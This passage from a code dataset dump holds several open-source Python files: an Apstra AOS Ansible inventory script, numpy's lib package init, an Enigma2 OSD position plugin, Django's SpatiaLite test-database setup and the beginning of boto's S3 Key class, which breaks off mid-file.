\"\",\n \"fqdn\": \"localhost\",\n \"hostname\": \"localhost\",\n \"hw_model\": \"Generic Model\",\n \"hw_version\": \"pc-i440fx-trusty\",\n \"is_acknowledged\": false,\n \"mgmt_ifname\": \"eth0\",\n \"mgmt_ipaddr\": \"172.20.52.4\",\n \"mgmt_macaddr\": \"52:54:00:e5:48:6d\",\n \"os_arch\": \"x86_64\",\n \"os_family\": \"Ubuntu GNU/Linux\",\n \"os_version\": \"14.04 LTS\",\n \"os_version_info\": {\n \"build\": \"\",\n \"major\": \"14\",\n \"minor\": \"04\"\n },\n \"serial_number\": \"525400E5486D\",\n \"state\": \"OOS-QUARANTINED\",\n \"vendor\": \"Generic Manufacturer\"\n }\n }\n },\n \"all\": {\n \"hosts\": [\n \"5254001CAFD8\",\n \"52540073956E\",\n \"525400DDDF72\",\n \"525400E5486D\",\n \"52540022211A\"\n ],\n \"vars\": {}\n },\n \"vEOS\": {\n \"hosts\": [\n \"5254001CAFD8\",\n \"525400DDDF72\"\n ],\n \"vars\": {}\n }\n}\n\"\"\"\n\n\ndef fail(msg):\n sys.stderr.write(\"%s\\n\" % msg)\n sys.exit(1)\n\n\nclass AosInventory(object):\n\n def __init__(self):\n\n \"\"\" Main execution path \"\"\"\n\n if not HAS_AOS_PYEZ:\n raise Exception('aos-pyez is not installed. Please see details here: https://github.com/Apstra/aos-pyez')\n if not HAS_ARGPARSE:\n raise Exception('argparse is not installed. Please install the argparse library or upgrade to python-2.7')\n\n # Initialize inventory\n self.inventory = dict() # A list of groups and the hosts in that group\n self.inventory['_meta'] = dict()\n self.inventory['_meta']['hostvars'] = dict()\n\n # Read settings and parse CLI arguments\n self.read_settings()\n self.parse_cli_args()\n\n # ----------------------------------------------------\n # Open session to AOS\n # ----------------------------------------------------\n aos = Session(server=self.aos_server,\n port=self.aos_server_port,\n user=self.aos_username,\n passwd=self.aos_password)\n\n aos.login()\n\n # Save session information in variables of group all\n self.add_var_to_group('all', 'aos_session', aos.session)\n\n # Add the AOS server itself in the inventory\n self.add_host_to_group(\"all\", 'aos')\n self.add_var_to_host(\"aos\", \"ansible_ssh_host\", self.aos_server)\n self.add_var_to_host(\"aos\", \"ansible_ssh_pass\", self.aos_password)\n self.add_var_to_host(\"aos\", \"ansible_ssh_user\", self.aos_username)\n\n # ----------------------------------------------------\n # Build the inventory\n # 2 modes are supported: device based or blueprint based\n # - For device based, the list of device is taken from the global device list\n # the serial ID will be used as the inventory_hostname\n # - For Blueprint based, the list of device is taken from the given blueprint\n # the Node name will be used as the inventory_hostname\n # ----------------------------------------------------\n if self.aos_blueprint:\n\n bp = aos.Blueprints[self.aos_blueprint]\n if bp.exists is False:\n fail(\"Unable to find the Blueprint: %s\" % self.aos_blueprint)\n\n for dev_name, dev_id in bp.params['devices'].value.items():\n\n self.add_host_to_group('all', dev_name)\n device = aos.Devices.find(uid=dev_id)\n\n if 'facts' in device.value.keys():\n self.add_device_facts_to_var(dev_name, device)\n\n # Define admin State and Status\n if 'user_config' in device.value.keys():\n if 'admin_state' in device.value['user_config'].keys():\n self.add_var_to_host(dev_name, 'admin_state', device.value['user_config']['admin_state'])\n\n self.add_device_status_to_var(dev_name, device)\n\n # Go over the contents data structure\n for node in bp.contents['system']['nodes']:\n if node['display_name'] == dev_name:\n self.add_host_to_group(node['role'], dev_name)\n\n # Check for additional attribute to import\n attributes_to_import = [\n 'loopback_ip',\n 'asn',\n 'role',\n 'position',\n ]\n for attr in attributes_to_import:\n if attr in node.keys():\n self.add_var_to_host(dev_name, attr, node[attr])\n\n # if blueprint_interface is enabled in the configuration\n # Collect links information\n if self.aos_blueprint_int:\n interfaces = dict()\n\n for link in bp.contents['system']['links']:\n # each link has 2 sides [0,1], and it's unknown which one match this device\n # at first we assume, first side match(0) and peer is (1)\n peer_id = 1\n\n for side in link['endpoints']:\n if side['display_name'] == dev_name:\n\n # import local information first\n int_name = side['interface']\n\n # init dict\n interfaces[int_name] = dict()\n if 'ip' in side.keys():\n interfaces[int_name]['ip'] = side['ip']\n\n if 'interface' in side.keys():\n interfaces[int_name]['name'] = side['interface']\n\n if 'display_name' in link['endpoints'][peer_id].keys():\n interfaces[int_name]['peer'] = link['endpoints'][peer_id]['display_name']\n\n if 'ip' in link['endpoints'][peer_id].keys():\n interfaces[int_name]['peer_ip'] = link['endpoints'][peer_id]['ip']\n\n if 'type' in link['endpoints'][peer_id].keys():\n interfaces[int_name]['peer_type'] = link['endpoints'][peer_id]['type']\n\n else:\n # if we haven't match the first time, prepare the peer_id\n # for the second loop iteration\n peer_id = 0\n\n self.add_var_to_host(dev_name, 'interfaces', interfaces)\n\n else:\n for device in aos.Devices:\n # If not reacheable, create by key and\n # If reacheable, create by hostname\n\n self.add_host_to_group('all', device.name)\n\n # populate information for this host\n self.add_device_status_to_var(device.name, device)\n\n if 'user_config' in device.value.keys():\n for key, value in device.value['user_config'].items():\n self.add_var_to_host(device.name, key, value)\n\n # Based on device status online|offline, collect facts as well\n if device.value['status']['comm_state'] == 'on':\n\n if 'facts' in device.value.keys():\n self.add_device_facts_to_var(device.name, device)\n\n # Check if device is associated with a blueprint\n # if it's create a new group\n if 'blueprint_active' in device.value['status'].keys():\n if 'blueprint_id' in device.value['status'].keys():\n bp = aos.Blueprints.find(uid=device.value['status']['blueprint_id'])\n\n if bp:\n self.add_host_to_group(bp.name, device.name)\n\n # ----------------------------------------------------\n # Convert the inventory and return a JSON String\n # ----------------------------------------------------\n data_to_print = \"\"\n data_to_print += self.json_format_dict(self.inventory, True)\n\n print(data_to_print)\n\n def read_settings(self):\n \"\"\" Reads the settings from the apstra_aos.ini file \"\"\"\n\n config = configparser.ConfigParser()\n config.read(os.path.dirname(os.path.realpath(__file__)) + '/apstra_aos.ini')\n\n # Default Values\n self.aos_blueprint = False\n self.aos_blueprint_int = True\n self.aos_username = 'admin'\n self.aos_password = 'admin'\n self.aos_server_port = 8888\n\n # Try to reach all parameters from File, if not available try from ENV\n try:\n self.aos_server = config.get('aos', 'aos_server')\n except:\n if 'AOS_SERVER' in os.environ.keys():\n self.aos_server = os.environ['AOS_SERVER']\n\n try:\n self.aos_server_port = config.get('aos', 'port')\n except:\n if 'AOS_PORT' in os.environ.keys():\n self.aos_server_port = os.environ['AOS_PORT']\n\n try:\n self.aos_username = config.get('aos', 'username')\n except:\n if 'AOS_USERNAME' in os.environ.keys():\n self.aos_username = os.environ['AOS_USERNAME']\n\n try:\n self.aos_password = config.get('aos', 'password')\n except:\n if 'AOS_PASSWORD' in os.environ.keys():\n self.aos_password = os.environ['AOS_PASSWORD']\n\n try:\n self.aos_blueprint = config.get('aos', 'blueprint')\n except:\n if 'AOS_BLUEPRINT' in os.environ.keys():\n self.aos_blueprint = os.environ['AOS_BLUEPRINT']\n\n try:\n if config.get('aos', 'blueprint_interface') in ['false', 'no']:\n self.aos_blueprint_int = False\n except:\n pass\n\n def parse_cli_args(self):\n \"\"\" Command line argument processing \"\"\"\n\n parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on Apstra AOS')\n parser.add_argument('--list', action='store_true', default=True, help='List instances (default: True)')\n parser.add_argument('--host', action='store', help='Get all the variables about a specific instance')\n self.args = parser.parse_args()\n\n def json_format_dict(self, data, pretty=False):\n \"\"\" Converts a dict to a JSON object and dumps it as a formatted string \"\"\"\n\n if pretty:\n return json.dumps(data, sort_keys=True, indent=2)\n else:\n return json.dumps(data)\n\n def add_host_to_group(self, group, host):\n\n # Cleanup group name first\n clean_group = self.cleanup_group_name(group)\n\n # Check if the group exist, if not initialize it\n if clean_group not in self.inventory.keys():\n self.inventory[clean_group] = {}\n self.inventory[clean_group]['hosts'] = []\n self.inventory[clean_group]['vars'] = {}\n\n self.inventory[clean_group]['hosts'].append(host)\n\n def add_var_to_host(self, host, var, value):\n\n # Check if the host exist, if not initialize it\n if host not in self.inventory['_meta']['hostvars'].keys():\n self.inventory['_meta']['hostvars'][host] = {}\n\n self.inventory['_meta']['hostvars'][host][var] = value\n\n def add_var_to_group(self, group, var, value):\n\n # Cleanup group name first\n clean_group = self.cleanup_group_name(group)\n\n # Check if the group exist, if not initialize it\n if clean_group not in self.inventory.keys():\n self.inventory[clean_group] = {}\n self.inventory[clean_group]['hosts'] = []\n self.inventory[clean_group]['vars'] = {}\n\n self.inventory[clean_group]['vars'][var] = value\n\n def add_device_facts_to_var(self, device_name, device):\n\n # Populate variables for this host\n self.add_var_to_host(device_name,\n 'ansible_ssh_host',\n device.value['facts']['mgmt_ipaddr'])\n\n self.add_var_to_host(device_name, 'id', device.id)\n\n # self.add_host_to_group('all', device.name)\n for key, value in device.value['facts'].items():\n self.add_var_to_host(device_name, key, value)\n\n if key == 'os_family':\n self.add_host_to_group(value, device_name)\n elif key == 'hw_model':\n self.add_host_to_group(value, device_name)\n\n def cleanup_group_name(self, group_name):\n \"\"\"\n Clean up group name by :\n - Replacing all non-alphanumeric caracter by underscore\n - Converting to lowercase\n \"\"\"\n\n rx = re.compile('\\W+')\n clean_group = rx.sub('_', group_name).lower()\n\n return clean_group\n\n def add_device_status_to_var(self, device_name, device):\n\n if 'status' in device.value.keys():\n for key, value in device.value['status'].items():\n self.add_var_to_host(device.name, key, value)\n\n# Run the script\nif __name__ == '__main__':\n AosInventory()\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2446,"cells":{"repo_name":{"kind":"string","value":"alephu5/Soundbyte"},"path":{"kind":"string","value":"environment/lib/python3.3/site-packages/numpy/lib/__init__.py"},"copies":{"kind":"string","value":"16"},"size":{"kind":"string","value":"1122"},"content":{"kind":"string","value":"from __future__ import division, absolute_import, print_function\n\nimport math\n\nfrom .info import __doc__\nfrom numpy.version import version as __version__\n\nfrom .type_check import *\nfrom .index_tricks import *\nfrom .function_base import *\nfrom .nanfunctions import *\nfrom .shape_base import *\nfrom .stride_tricks import *\nfrom .twodim_base import *\nfrom .ufunclike import *\n\nfrom . import scimath as emath\nfrom .polynomial import *\n#import convertcode\nfrom .utils import *\nfrom .arraysetops import *\nfrom .npyio import *\nfrom .financial import *\nfrom .arrayterator import *\nfrom .arraypad import *\n\n__all__ = ['emath', 'math']\n__all__ += type_check.__all__\n__all__ += index_tricks.__all__\n__all__ += function_base.__all__\n__all__ += shape_base.__all__\n__all__ += stride_tricks.__all__\n__all__ += twodim_base.__all__\n__all__ += ufunclike.__all__\n__all__ += arraypad.__all__\n__all__ += polynomial.__all__\n__all__ += utils.__all__\n__all__ += arraysetops.__all__\n__all__ += npyio.__all__\n__all__ += financial.__all__\n__all__ += nanfunctions.__all__\n\nfrom numpy.testing import Tester\ntest = Tester().test\nbench = Tester().bench\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2447,"cells":{"repo_name":{"kind":"string","value":"kingvuplus/EGAMI-E"},"path":{"kind":"string","value":"lib/python/Plugins/SystemPlugins/OSDPositionSetup/plugin.py"},"copies":{"kind":"string","value":"41"},"size":{"kind":"string","value":"4968"},"content":{"kind":"string","value":"from Screens.Screen import Screen\nfrom Components.ConfigList import ConfigListScreen\nfrom Components.config import config, ConfigSubsection, ConfigInteger, ConfigSlider, getConfigListEntry\n\nconfig.plugins.OSDPositionSetup = ConfigSubsection()\nconfig.plugins.OSDPositionSetup.dst_left = ConfigInteger(default = 0)\nconfig.plugins.OSDPositionSetup.dst_width = ConfigInteger(default = 720)\nconfig.plugins.OSDPositionSetup.dst_top = ConfigInteger(default = 0)\nconfig.plugins.OSDPositionSetup.dst_height = ConfigInteger(default = 576)\n\nclass OSDScreenPosition(Screen, ConfigListScreen):\n\tskin = \"\"\"\n\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\"\"\"\n\n\tdef __init__(self, session):\n\t\tself.skin = OSDScreenPosition.skin\n\t\tScreen.__init__(self, session)\n\n\t\tfrom Components.ActionMap import ActionMap\n\t\tfrom Components.Button import Button\n\n\t\tself[\"ok\"] = Button(_(\"OK\"))\n\t\tself[\"cancel\"] = Button(_(\"Cancel\"))\n\n\t\tself[\"actions\"] = ActionMap([\"SetupActions\", \"ColorActions\", \"MenuActions\"],\n\t\t{\n\t\t\t\"ok\": self.keyGo,\n\t\t\t\"save\": self.keyGo,\n\t\t\t\"cancel\": self.keyCancel,\n\t\t\t\"green\": self.keyGo,\n\t\t\t\"red\": self.keyCancel,\n\t\t\t\"menu\": self.closeRecursive,\n\t\t}, -2)\n\n\t\tself.list = []\n\t\tConfigListScreen.__init__(self, self.list, session = self.session)\n\n\t\tleft = config.plugins.OSDPositionSetup.dst_left.value\n\t\twidth = config.plugins.OSDPositionSetup.dst_width.value\n\t\ttop = config.plugins.OSDPositionSetup.dst_top.value\n\t\theight = config.plugins.OSDPositionSetup.dst_height.value\n\n\t\tself.dst_left = ConfigSlider(default = left, increment = 1, limits = (0, 720))\n\t\tself.dst_width = ConfigSlider(default = width, increment = 1, limits = (0, 720))\n\t\tself.dst_top = ConfigSlider(default = top, increment = 1, limits = (0, 576))\n\t\tself.dst_height = ConfigSlider(default = height, increment = 1, limits = (0, 576))\n\t\tself.list.append(getConfigListEntry(_(\"left\"), self.dst_left))\n\t\tself.list.append(getConfigListEntry(_(\"width\"), self.dst_width))\n\t\tself.list.append(getConfigListEntry(_(\"top\"), self.dst_top))\n\t\tself.list.append(getConfigListEntry(_(\"height\"), self.dst_height))\n\t\tself[\"config\"].list = self.list\n\t\tself[\"config\"].l.setList(self.list)\n\n\tdef keyLeft(self):\n\t\tConfigListScreen.keyLeft(self)\n\t\tself.setPreviewPosition()\n\n\tdef keyRight(self):\n\t\tConfigListScreen.keyRight(self)\n\t\tself.setPreviewPosition()\n\n\tdef setPreviewPosition(self):\n\t\tsetPosition(int(self.dst_left.value), int(self.dst_width.value), int(self.dst_top.value), int(self.dst_height.value))\n\n\tdef keyGo(self):\n\t\tconfig.plugins.OSDPositionSetup.dst_left.value = self.dst_left.value\n\t\tconfig.plugins.OSDPositionSetup.dst_width.value = self.dst_width.value\n\t\tconfig.plugins.OSDPositionSetup.dst_top.value = self.dst_top.value\n\t\tconfig.plugins.OSDPositionSetup.dst_height.value = self.dst_height.value\n\t\tconfig.plugins.OSDPositionSetup.save()\n\t\tself.close()\n\n\tdef keyCancel(self):\n\t\tsetConfiguredPosition()\n\t\tself.close()\n\ndef setPosition(dst_left, dst_width, dst_top, dst_height):\n\tif dst_left + dst_width > 720:\n\t\tdst_width = 720 - dst_left\n\tif dst_top + dst_height > 576:\n\t\tdst_height = 576 - dst_top\n\ttry:\n\t\tfile = open(\"/proc/stb/vmpeg/0/dst_left\", \"w\")\n\t\tfile.write('%X' % dst_left)\n\t\tfile.close()\n\t\tfile = open(\"/proc/stb/vmpeg/0/dst_width\", \"w\")\n\t\tfile.write('%X' % dst_width)\n\t\tfile.close()\n\t\tfile = open(\"/proc/stb/vmpeg/0/dst_top\", \"w\")\n\t\tfile.write('%X' % dst_top)\n\t\tfile.close()\n\t\tfile = open(\"/proc/stb/vmpeg/0/dst_height\", \"w\")\n\t\tfile.write('%X' % dst_height)\n\t\tfile.close()\n\texcept:\n\t\treturn\n\ndef setConfiguredPosition():\n\tsetPosition(int(config.plugins.OSDPositionSetup.dst_left.value), int(config.plugins.OSDPositionSetup.dst_width.value), int(config.plugins.OSDPositionSetup.dst_top.value), int(config.plugins.OSDPositionSetup.dst_height.value))\n\ndef main(session, **kwargs):\n\tsession.open(OSDScreenPosition)\n\ndef startup(reason, **kwargs):\n\tsetConfiguredPosition()\n\ndef Plugins(**kwargs):\n\tfrom os import path\n\tif path.exists(\"/proc/stb/vmpeg/0/dst_left\"):\n\t\tfrom Plugins.Plugin import PluginDescriptor\n\t\treturn [PluginDescriptor(name = \"OSD position setup\", description = \"Compensate for overscan\", where = PluginDescriptor.WHERE_PLUGINMENU, fnc = main),\n\t\t\t\t\tPluginDescriptor(name = \"OSD position setup\", description = \"\", where = PluginDescriptor.WHERE_SESSIONSTART, fnc = startup)]\n\treturn []\n"},"license":{"kind":"string","value":"gpl-2.0"}}},{"rowIdx":2448,"cells":{"repo_name":{"kind":"string","value":"onceuponatimeforever/oh-mainline"},"path":{"kind":"string","value":"vendor/packages/Django/django/contrib/gis/db/backends/spatialite/creation.py"},"copies":{"kind":"string","value":"100"},"size":{"kind":"string","value":"5765"},"content":{"kind":"string","value":"import os\nfrom django.conf import settings\nfrom django.core.cache import get_cache\nfrom django.core.cache.backends.db import BaseDatabaseCache\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db.backends.sqlite3.creation import DatabaseCreation\n\nclass SpatiaLiteCreation(DatabaseCreation):\n\n def create_test_db(self, verbosity=1, autoclobber=False):\n \"\"\"\n Creates a test database, prompting the user for confirmation if the\n database already exists. Returns the name of the test database created.\n\n This method is overloaded to load up the SpatiaLite initialization\n SQL prior to calling the `syncdb` command.\n \"\"\"\n # Don't import django.core.management if it isn't needed.\n from django.core.management import call_command\n\n test_database_name = self._get_test_db_name()\n\n if verbosity >= 1:\n test_db_repr = ''\n if verbosity >= 2:\n test_db_repr = \" ('%s')\" % test_database_name\n print(\"Creating test database for alias '%s'%s...\" % (self.connection.alias, test_db_repr))\n\n self._create_test_db(verbosity, autoclobber)\n\n self.connection.close()\n self.connection.settings_dict[\"NAME\"] = test_database_name\n self.connection.ops.confirm_spatial_components_versions()\n\n # Need to load the SpatiaLite initialization SQL before running `syncdb`.\n self.load_spatialite_sql()\n\n # Report syncdb messages at one level lower than that requested.\n # This ensures we don't get flooded with messages during testing\n # (unless you really ask to be flooded)\n call_command('syncdb',\n verbosity=max(verbosity - 1, 0),\n interactive=False,\n database=self.connection.alias,\n load_initial_data=False)\n\n # We need to then do a flush to ensure that any data installed by\n # custom SQL has been removed. The only test data should come from\n # test fixtures, or autogenerated from post_syncdb triggers.\n # This has the side effect of loading initial data (which was\n # intentionally skipped in the syncdb).\n call_command('flush',\n verbosity=max(verbosity - 1, 0),\n interactive=False,\n database=self.connection.alias)\n\n from django.core.cache import get_cache\n from django.core.cache.backends.db import BaseDatabaseCache\n for cache_alias in settings.CACHES:\n cache = get_cache(cache_alias)\n if isinstance(cache, BaseDatabaseCache):\n call_command('createcachetable', cache._table, database=self.connection.alias)\n\n # Get a cursor (even though we don't need one yet). This has\n # the side effect of initializing the test database.\n cursor = self.connection.cursor()\n\n return test_database_name\n\n def sql_indexes_for_field(self, model, f, style):\n \"Return any spatial index creation SQL for the field.\"\n from django.contrib.gis.db.models.fields import GeometryField\n\n output = super(SpatiaLiteCreation, self).sql_indexes_for_field(model, f, style)\n\n if isinstance(f, GeometryField):\n gqn = self.connection.ops.geo_quote_name\n qn = self.connection.ops.quote_name\n db_table = model._meta.db_table\n\n output.append(style.SQL_KEYWORD('SELECT ') +\n style.SQL_TABLE('AddGeometryColumn') + '(' +\n style.SQL_TABLE(gqn(db_table)) + ', ' +\n style.SQL_FIELD(gqn(f.column)) + ', ' +\n style.SQL_FIELD(str(f.srid)) + ', ' +\n style.SQL_COLTYPE(gqn(f.geom_type)) + ', ' +\n style.SQL_KEYWORD(str(f.dim)) + ', ' +\n style.SQL_KEYWORD(str(int(not f.null))) +\n ');')\n\n if f.spatial_index:\n output.append(style.SQL_KEYWORD('SELECT ') +\n style.SQL_TABLE('CreateSpatialIndex') + '(' +\n style.SQL_TABLE(gqn(db_table)) + ', ' +\n style.SQL_FIELD(gqn(f.column)) + ');')\n\n return output\n\n def load_spatialite_sql(self):\n \"\"\"\n This routine loads up the SpatiaLite SQL file.\n \"\"\"\n if self.connection.ops.spatial_version[:2] >= (2, 4):\n # Spatialite >= 2.4 -- No need to load any SQL file, calling\n # InitSpatialMetaData() transparently creates the spatial metadata\n # tables\n cur = self.connection._cursor()\n cur.execute(\"SELECT InitSpatialMetaData()\")\n else:\n # Spatialite < 2.4 -- Load the initial SQL\n\n # Getting the location of the SpatiaLite SQL file, and confirming\n # it exists.\n spatialite_sql = self.spatialite_init_file()\n if not os.path.isfile(spatialite_sql):\n raise ImproperlyConfigured('Could not find the required SpatiaLite initialization '\n 'SQL file (necessary for testing): %s' % spatialite_sql)\n\n # Opening up the SpatiaLite SQL initialization file and executing\n # as a script.\n with open(spatialite_sql, 'r') as sql_fh:\n cur = self.connection._cursor()\n cur.executescript(sql_fh.read())\n\n def spatialite_init_file(self):\n # SPATIALITE_SQL may be placed in settings to tell GeoDjango\n # to use a specific path to the SpatiaLite initilization SQL.\n return getattr(settings, 'SPATIALITE_SQL',\n 'init_spatialite-%s.%s.sql' %\n self.connection.ops.spatial_version[:2])\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2449,"cells":{"repo_name":{"kind":"string","value":"bleib1dj/boto"},"path":{"kind":"string","value":"boto/s3/key.py"},"copies":{"kind":"string","value":"22"},"size":{"kind":"string","value":"82475"},"content":{"kind":"string","value":"# Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/\n# Copyright (c) 2011, Nexenta Systems Inc.\n# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish, dis-\n# tribute, sublicense, and/or sell copies of the Software, and to permit\n# persons to whom the Software is furnished to do so, subject to the fol-\n# lowing conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-\n# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT\n# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\nimport email.utils\nimport errno\nimport hashlib\nimport mimetypes\nimport os\nimport re\nimport base64\nimport binascii\nimport math\nfrom hashlib import md5\nimport boto.utils\nfrom boto.compat import BytesIO, six, urllib, encodebytes\n\nfrom boto.exception import BotoClientError\nfrom boto.exception import StorageDataError\nfrom boto.exception import PleaseRetryException\nfrom boto.provider import Provider\nfrom boto.s3.keyfile import KeyFile\nfrom boto.s3.user import User\nfrom boto import UserAgent\nfrom boto.utils import compute_md5, compute_hash\nfrom boto.utils import find_matching_headers\nfrom boto.utils import merge_headers_by_name\n\n\nclass Key(object):\n \"\"\"\n Represents a key (object) in an S3 bucket.\n\n :ivar bucket: The parent :class:`boto.s3.bucket.Bucket`.\n :ivar name: The name of this Key object.\n :ivar metadata: A dictionary containing user metadata that you\n wish to store with the object or that has been retrieved from\n an existing object.\n :ivar cache_control: The value of the `Cache-Control` HTTP header.\n :ivar content_type: The value of the `Content-Type` HTTP header.\n :ivar content_encoding: The value of the `Content-Encoding` HTTP header.\n :ivar content_disposition: The value of the `Content-Disposition` HTTP\n header.\n :ivar content_language: The value of the `Content-Language` HTTP header.\n :ivar etag: The `etag` associated with this object.\n :ivar last_modified: The string timestamp representing the last\n time this object was modified in S3.\n :ivar owner: The ID of the owner of this object.\n :ivar storage_class: The storage class of the object. Currently, one of:\n STANDARD | REDUCED_REDUNDANCY | GLACIER\n :ivar md5: The MD5 hash of the contents of the object.\n :ivar size: The size, in bytes, of the object.\n :ivar version_id: The version ID of this object, if it is a versioned\n object.\n :ivar encrypted: Whether the object is encrypted while at rest on\n the server.\n \"\"\"\n\n DefaultContentType = 'application/octet-stream'\n\n RestoreBody = \"\"\"\n \n %s\n \"\"\"\n\n\n BufferSize = boto.config.getint('Boto', 'key_buffer_size', 8192)\n\n # The object metadata fields a user can set, other than custom metadata\n # fields (i.e., those beginning with a provider-specific prefix like\n # x-amz-meta).\n base_user_settable_fields = set([\"cache-control\", \"content-disposition\",\n \"content-encoding\", \"content-language\",\n \"content-md5\", \"content-type\",\n \"x-robots-tag\", \"expires\"])\n _underscore_base_user_settable_fields = set()\n for f in base_user_settable_fields:\n _underscore_base_user_settable_fields.add(f.replace('-', '_'))\n # Metadata fields, whether user-settable or not, other than custom\n # metadata fields (i.e., those beginning with a provider specific prefix\n # like x-amz-meta).\n base_fields = (base_user_settable_fields |\n set([\"last-modified\", \"content-length\", \"date\", \"etag\"]))\n\n\n\n def __init__(self, bucket=None, name=None):\n self.bucket = bucket\n self.name = name\n self.metadata = {}\n self.cache_control = None\n self.content_type = self.DefaultContentType\n self.content_encoding = None\n self.content_disposition = None\n self.content_language = None\n self.filename = None\n self.etag = None\n self.is_latest = False\n self.last_modified = None\n self.owner = None\n self._storage_class = None\n self.path = None\n self.resp = None\n self.mode = None\n self.size = None\n self.version_id = None\n self.source_version_id = None\n self.delete_marker = False\n self.encrypted = None\n # If the object is being restored, this attribute will be set to True.\n # If the object is restored, it will be set to False. Otherwise this\n # value will be None. If the restore is completed (ongoing_restore =\n # False), the expiry_date will be populated with the expiry date of the\n # restored object.\n self.ongoing_restore = None\n self.expiry_date = None\n self.local_hashes = {}\n\n def __repr__(self):\n if self.bucket:\n name = u'' % (self.bucket.name, self.name)\n else:\n name = u'' % self.name\n\n # Encode to bytes for Python 2 to prevent display decoding issues\n if not isinstance(name, str):\n name = name.encode('utf-8')\n\n return name\n\n def __iter__(self):\n return self\n\n @property\n def provider(self):\n provider = None\n if self.bucket and self.bucket.connection:\n provider = self.bucket.connection.provider\n return provider\n\n def _get_key(self):\n return self.name\n\n def _set_key(self, value):\n self.name = value\n\n key = property(_get_key, _set_key);\n\n def _get_md5(self):\n if 'md5' in self.local_hashes and self.local_hashes['md5']:\n return binascii.b2a_hex(self.local_hashes['md5'])\n\n def _set_md5(self, value):\n if value:\n self.local_hashes['md5'] = binascii.a2b_hex(value)\n elif 'md5' in self.local_hashes:\n self.local_hashes.pop('md5', None)\n\n md5 = property(_get_md5, _set_md5);\n\n def _get_base64md5(self):\n if 'md5' in self.local_hashes and self.local_hashes['md5']:\n md5 = self.local_hashes['md5']\n if not isinstance(md5, bytes):\n md5 = md5.encode('utf-8')\n return binascii.b2a_base64(md5).decode('utf-8').rstrip('\\n')\n\n def _set_base64md5(self, value):\n if value:\n if not isinstance(value, six.string_types):\n value = value.decode('utf-8')\n self.local_hashes['md5'] = binascii.a2b_base64(value)\n elif 'md5' in self.local_hashes:\n del self.local_hashes['md5']\n\n base64md5 = property(_get_base64md5, _set_base64md5);\n\n def _get_storage_class(self):\n if self._storage_class is None and self.bucket:\n # Attempt to fetch storage class\n list_items = list(self.bucket.list(self.name.encode('utf-8')))\n if len(list_items) and getattr(list_items[0], '_storage_class',\n None):\n self._storage_class = list_items[0]._storage_class\n else:\n # Key is not yet saved? Just use default...\n self._storage_class = 'STANDARD'\n\n return self._storage_class\n\n def _set_storage_class(self, value):\n self._storage_class = value\n\n storage_class = property(_get_storage_class, _set_storage_class)\n\n def get_md5_from_hexdigest(self, md5_hexdigest):\n \"\"\"\n A utility function to create the 2-tuple (md5hexdigest, base64md5)\n from just having a precalculated md5_hexdigest.\n \"\"\"\n digest = binascii.unhexlify(md5_hexdigest)\n base64md5 = encodebytes(digest)\n if base64md5[-1] == '\\n':\n base64md5 = base64md5[0:-1]\n return (md5_hexdigest, base64md5)\n\n def handle_encryption_headers(self, resp):\n provider = self.bucket.connection.provider\n if provider.server_side_encryption_header:\n self.encrypted = resp.getheader(\n provider.server_side_encryption_header, None)\n else:\n self.encrypted = None\n\n def handle_version_headers(self, resp, force=False):\n provider = self.bucket.connection.provider\n # If the Key object already has a version_id attribute value, it\n # means that it represents an explicit version and the user is\n # doing a get_contents_*(version_id=) to retrieve another\n # version of the Key. In that case, we don't really want to\n # overwrite the version_id in this Key object. Comprende?\n if self.version_id is None or force:\n self.version_id = resp.getheader(provider.version_id, None)\n self.source_version_id = resp.getheader(provider.copy_source_version_id,\n None)\n if resp.getheader(provider.delete_marker, 'false') == 'true':\n self.delete_marker = True\n else:\n self.delete_marker = False\n\n def handle_restore_headers(self, response):\n provider = self.bucket.connection.provider\n header = response.getheader(provider.restore_header)\n if header is None:\n return\n parts = header.split(',', 1)\n for part in parts:\n key, val = [i.strip() for i in part.split('=')]\n val = val.replace('\"', '')\n if key == 'ongoing-request':\n self.ongoing_restore = True if val.lower() == 'true' else False\n elif key == 'expiry-date':\n self.expiry_date = val\n\n def handle_addl_headers(self, headers):\n \"\"\"\n Used by Key subclasses to do additional, provider-specific\n processing of response headers. No-op for this base class.\n \"\"\"\n pass\n\n def open_read(self, headers=None, query_args='',\n override_num_retries=None, response_headers=None):\n \"\"\"\n Open this key for reading\n\n :type headers: dict\n :param headers: Headers to pass in the web request\n\n :type query_args: string\n :param query_args: Arguments to pass in the query string\n (ie, 'torrent')\n\n :type override_num_retries: int\n :param override_num_retries: If not None will override configured\n num_retries parameter for underlying GET.\n\n :type response_headers: dict\n :param response_headers: A dictionary containing HTTP\n headers/values that will override any headers associated\n with the stored object in the response. See\n http://goo.gl/EWOPb for details.\n \"\"\"\n if self.resp is None:\n self.mode = 'r'\n\n provider = self.bucket.connection.provider\n self.resp = self.bucket.connection.make_request(\n 'GET', self.bucket.name, self.name, headers,\n query_args=query_args,\n override_num_retries=override_num_retries)\n if self.resp.status < 199 or self.resp.status > 299:\n body = self.resp.read()\n raise provider.storage_response_error(self.resp.status,\n self.resp.reason, body)\n response_headers = self.resp.msg\n self.metadata = boto.utils.get_aws_metadata(response_headers,\n provider)\n for name, value in response_headers.items():\n # To get correct size for Range GETs, use Content-Range\n # header if one was returned. If not, use Content-Length\n # header.\n if (name.lower() == 'content-length' and\n 